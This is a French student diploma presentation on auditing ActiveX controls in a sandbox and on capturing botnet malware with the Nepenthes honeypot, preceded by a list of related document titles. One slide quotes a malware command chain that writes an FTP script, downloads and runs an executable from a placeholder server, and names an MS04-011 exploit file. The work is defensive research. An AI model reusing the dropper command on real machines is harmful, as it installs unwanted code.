Etude & Audit d ActiveX



Documents pareils
Table des matières. Avant-propos... Préface... XIII. Remerciements...

Étude des Spywares. Étudiant : Professeur responsable : En collaboration avec : DE SOUSA Bruno LITZISTORF Gérald TRUPHEME Florent Telecom System 2005

Laboratoire de Haute Sécurité. Télescope réseau et sécurité des réseaux

S Catalogue des Formations Sécurité. Présentation. Menu. Présentation P.2 Nos formations P.3 Modalités P.9 Bulletin d inscription P.

Introduction aux antivirus et présentation de ClamAV

GlobalScape Secure FTP Server Buffer Overflow

Bilan 2008 du Cert-IST sur les failles et attaques

Attaques applicatives

JAB, une backdoor pour réseau Win32 inconnu

Topologies et Outils d Alertesd

Managed VirusScan et renforce ses services

Lyon, mardi 10 décembre 2002! "#$%&"'"# &(

But de cette présentation. Bac à sable (Sandbox) Principes. Principes. Hainaut P

Présentation de la solution Open Source «Vulture» Version 2.0

Indicateur et tableau de bord

Rootkit pour Windows Mobile 6

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Etat de l art des malwares

«Le malware en 2005 Unix, Linux et autres plates-formes»

LA PROTECTION DES DONNÉES

SRS Day. Vue d ensemble. Avérous Julien-Pierre

Les rootkits navigateurs

Expérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet

INTRUSION SUR INTERNET

ClariLog - Asset View Suite

Guide de démarrage

Faits techniques et retour d'expérience d'une cellule d'expertise dans la lutte contre le code malveillant. EdelWeb / Groupe ON-X

OSSIR Groupe SécuritS. curité Windows. Réunion du du février 2006 EADS. Réunion OSSIR du 13/02/2006. page 1

CIE 1 : Mise en service d un PC, y compris le domaine de la sécurité informatique :

Tivoli Endpoint Manager Introduction IBM Corporation

Le socle de sécurité nouvelle génération Consolider, virtualiser et simplifier les architectures sécurisées

PPE 2-1 Support Systeme. Partie Support Système

Java et les bases de données: JDBC: Java DataBase Connectivity SQLJ: Embedded SQL in Java. Michel Bonjour

Documentation d information technique spécifique Education. PGI Open Line PRO

Dr.Web Les Fonctionnalités

OSSIR Groupe SécuritS. curité Windows. Réunion du du 9 octobre 2006 EADS. Réunion OSSIR du 09/10/2006. page 1

Sécurité des réseaux Les attaques

Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE

Vulnérabilités et sécurisation des applications Web

Intelligent firewall.

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications.

Firewall IDS Architecture. Assurer le contrôle des connexions au. Sécurité 1

Contrôle de la DreamBox à travers un canal SSH

INSTALLATION ET LANCEMENT DU CONNECTEUR E-SIDOC

TEST D INTRUISION. Document Technique

Dynamic Malware Analysis for dummies

Audits de sécurité, supervision en continu Renaud Deraison

Groupe Eyrolles, 2004, ISBN :

Dispositif e-learning déployé sur les postes de travail

Virtualisation & Sécurité

Un serveur FTP personnel, ça ne vous a jamais dit?

GESLAB_Pre-Requis_v2.0.doc 01/03/2013. Pré-Requis

Audits Sécurité. Des architectures complexes

Formation en Sécurité Informatique

Fiche Technique. Cisco Security Agent

Architectures web/bases de données

La protection des systèmes Mac et Linux : un besoin réel?

Un serveur web léger et ouvert

Urbanisation des SI Conduite du changement IT 20/03/09. Patrick CHAMBET

Extraction de données authentifiantes de la mémoire Windows

Développer des Applications Internet Riches (RIA) avec les API d ArcGIS Server. Sébastien Boutard Thomas David

Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria

Introduction aux buffer overflow, CS335

PLAteforme d Observation de l InterNet (PLATON)

PROJET D INTERCONNEXION

Présentation commonit pour la réunion de l OSSIR du 10 Mars 2009 : - La société commonit - Le marché - La solution Virtual Browser - Démonstration

Syfadis. > Configuration du poste client. Nous vous aidons à réussir. REFERENCE : Syfadis LMS - 20/06/2007. AUTEUR : Equipe technique Syfadis

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation

Single Sign On. Nicolas Dewaele. Single Sign On. Page 1. et Web SSO

Syfadis. > Configuration du poste client. Nous vous aidons à réussir. REFERENCE : Syfadis LMS - 12/09/2008. AUTEUR : Equipe technique Syfadis

Ubuntu Linux Création, configuration et gestion d'un réseau local d'entreprise (3ième édition)

Développement d applications Internet et réseaux avec LabVIEW. Alexandre STANURSKI National Instruments France

QUESTIONS / REPONSES ESET Smart Security ESET NOD32 Antivirus V.3

Nouveaux outils de consolidation de la défense périmétrique

Table des matières Avant-propos... V Scripting Windows, pour quoi faire?... 1 Dans quel contexte?

sécurisation des systèmes d information BE READY FOR WHAT S NEXT. Kaspersky Open Space Security

Cybercriminalité. les tendances pour 2015

EA D S INNOVA TION W ORKS. Mobilité et sécurité. Nicolas RUFF nicolas.ruff [à] eads.net

Systèmes d exploitation

CATALOGUE DES FORMATIONS SECURITE INFORMATIQUE

Java et les bases de données

Les commandes relatives aux réseaux

1 Présentation de la solution client/serveur Mobilegov Digital DNA ID BOX

Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)

Transfert d un site local vers un serveur. NPDS REvolution 13. Rédaction : Axel Relecture : Dev & Jpb

DenyAll Detect. Documentation technique 27/07/2015

SECURIDAY 2012 Pro Edition

Prise en main d un poste de travail sous Windows sur le réseau du département MMI de l'upemlv. d après M. Berthet et G.Charpentier

INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau)

IBM Tivoli Compliance Insight Manager

Exonet : sauvegarde automatisée d une base de données

L3 informatique TP n o 2 : Les applications réseau

Guide de l'administrateur Citrix Personal vdisk 5.6.5

LICENCE PROFESSIONNELLE SYSTEMES INFORMATIQUES & LOGICIELS

Le cloud,c est quoi au juste?

Tutoriel Création d une source Cydia et compilation des packages sous Linux

Welcome. Bienvenue. Willkommen. welkom. yôkoso. Benvenuto. Bienvenida. tervetuloa

SESSION 2014 ÉPREUVE À OPTION. (durée : 4 heures coefficient : 6 note éliminatoire 4 sur 20)

Pourquoi choisir ESET Business Solutions?

Transcription:

Etude & Audit d ActiveX 1 ère partie Laboratoire de Transmission de données Auteur: Quintela Javier Professeur responsable: Litzistorf Gérald Travail de diplôme Session 2007 Filière Télécommunications 1

Plan Objectifs ActiveX, précisions Audit Outils Sandboxie Démonstration Conclusion 2

Objectifs Etude du fonctionnement des ActiveX (2 sem.) Risques liés à cette technologie (1 sem.) Identification de comportements malicieux (1 sem.) -> Environnement : Windows XP SP2 3

ActiveX, précisions Indépendants du langage de programmation (Component Object Model, COM) Accès aux ressources Serveurs : in-process (dll,.ocx) out-process(exe) Interaction, dialogue : Propriétés, méthodes, évènements 4

Type Library xenroll.dll A2B1-21490A70C8A1), helpstring("cenroll Class") ] [ uuid(127698e4-e730-4e5c- [ odl, uuid(43f8f288-7a20-11d0-8f06-00c04fc295e1), helpstring ("ICEnroll Interface"), dual, oleautomation ] interface ICEnroll: IDispatch{ } [id(0x60020005)] HRESULT enumproviders( [in] long dwindex, [in] long dwflags, [out, retval] BSTR* pbstrprovname); Code HTML: <object classid= "clsid:127698e4-e730-4e5c-a2b1-21490a70c8a1" codebase="xenroll.dll" id=xenroll>...xenroll.enumproviders(i, 0)... 5

Outils OLE/COM Object Viewer, OleView Page HTML (JavaScript) Process Monitor TCPview -> Wireshark -> Strings 6

Sandboxie Bac à sable Accès aux ressources en lecture Ecriture bloquée dans bac à sable 7

Sandboxieen détails Différents tests effectués : Exécution d un fichier.reg -> Ecriture dans registre Sandboxie Spyware (hotbar) -> Installation complète dans Sandboxie Simulateur de trojans (Trojan Simulator) -> Installation complète dans Sandboxie Rootkit(Unreal rootkit 1.0.1.0) -> Interdiction de charger des drivers Intallation d ActiveX -> démo -> Installation complète dans Sandboxie 8

Difficultés rencontrées Complexité du modèle COM (documentation high level, conceptuelle) Utilisation du terme ActiveX dans la bibliographie qui porte à confusion (mélanges) Sujet plutôt domaine informatique 9

Démonstration https:\\www.secure.td.unige.ch Illustration d une dll ActiveX comportant une vulnérabilité Installation d un ActiveX dans Sandboxie 10

Conclusion Technologie offrant beaucoup de possibilités -> Dangereuse pour ces mêmes raisons Audit complet généralement difficile (long) -> beaucoup de méthodes à contrôler Buffer Overflow non-traités (faute de temps) -> Utilisation de fuzzers 11

Botnets 2 ème partie Laboratoire de Transmission de données Auteur: Quintela Javier Professeur responsable: Litzistorf Gérald En collaboration avec Bruno Kerouanton Travail de diplôme Session 2007 Filière Télécommunications Suite du projet de semestre: Détecter les botnets pour mieux s'en protéger 12

Plan Propagation des malwares Malwares récoltés Nepenthes Introduction Détails du logiciel Limitations Analyse de malwares Mécanismes d auto-défense Démonstration Conclusion (2 sem.) (1 sem.) (2 sem.) 13

Propagation des malware 14

Malwares récoltés Temps de capture : 47h. Fichiers récoltés : 1564 (17 binaires) Hitspar ports : 15

Hexdumps $ nc localhost 135 test du port pour verifier qu il est bien ouvert!!! Log Nepenthes: [ ] Unknown DCOM Shellcode (Buffer 52 bytes) (State 0) [ ] Stored Hexdump/var/lib/nepenthes/hexdumps/a7ffcf6399fed5dfc4e32e45e7d1b5a2.bin (0x080aa208, 0x00000034). [ ] =------------------[ hexdump(0x080aa208, 0x00000034) ]-------------------= [ ] 0x0000 74 65 73 74 20 64 75 20 70 6f 72 74 20 70 6f 75 test du port pou [ ] 0x0010 72 20 76 65 72 69 66 69 65 72 20 71 75 27 69 6c r verifi er qu'il [ ] 0x0020 20 65 73 74 20 62 69 65 6e 20 6f 75 76 65 72 74 est bie n ouvert [...] 0x0030 21 21 21 0a!!! [ ] =-------------------------------------------------------------------------= 16

Nepenthes Honeypot à faible interaction, côté serveur Simule vulnérabilités Windows Environnement Linux (Ubuntu 7.10) Architecture modulaire 17

Modules de vulnérabilités Vulnérabilité: Windows Local Security Authorithy Service (lsass), MS04-011 Systèmes affectés: Windows 2000, XP Exploit: HOD-ms04011-lsasrv-expl.c Module: vuln-lsass Port: 445 18

Modules de vulnérabilités 19

Exemple d utilisation d un shell cmd /c echo open IP_SERVEUR>> temp& echo user LOGIN PASSWORD>> temp& echo binary>> temp & echo get NOM.EXE>> temp& echo quit >> temp & ftp -n -v -s:temp& del temp & NOM.EXE 20

Limitations Honeypot côté serveur Simulation des services vulnérables 0-days exploits Nombre d OS simulés 21

Analyse des malwares Antivirus (8 nov. 2007) Stinger(ver. 3.8.0) 1/17 Avast Version 4.7.1043 6/17 McAffee VirusScan Entreprise 7.1.0 9/17 VirusTotal Uploader 17/17 22

Mécanismes d auto-défense Compliquer Détection du malware à l aide des définitions Analyse «manuelle» du code Découverte du malware dans système Détection des logiciels de défense (antivirus, firewall) -> Modifications du comportement -> Packers 23

Mécanismes d auto-défense -Exemple 24

Analyse personnelle Analyse statique Long Fastidieux Contourner mécanismes de protections Analyse dynamique Résultats rapidement «Contournement» des protections 25

Analyse sandboxes Avantages : Rapidité d analyse Clarté des rapports Compromission du système Inconvénients : Environnement virtuels (détection) 26

Difficultés Adaptation à l environnement Linux Compréhension de l architecture de Nepenthes (programmation C++) Essai d analyse par reverse engineering > Packers > Type portable exécutable et tables d importation sujet très complet et complexe 27

Démonstration Analyse de G0ahic.exe (Détection de machines virtuelles utilisées par les sandboxes) Illustration de l utilisation d un module de vulnérabilité (vuln-lsass) 28

Conclusion Vecteurs d attaques nombreux Analyse dans environnement sécurisé Combiner différents types d honeypots Idem pour sandboxes 29

Questions? 30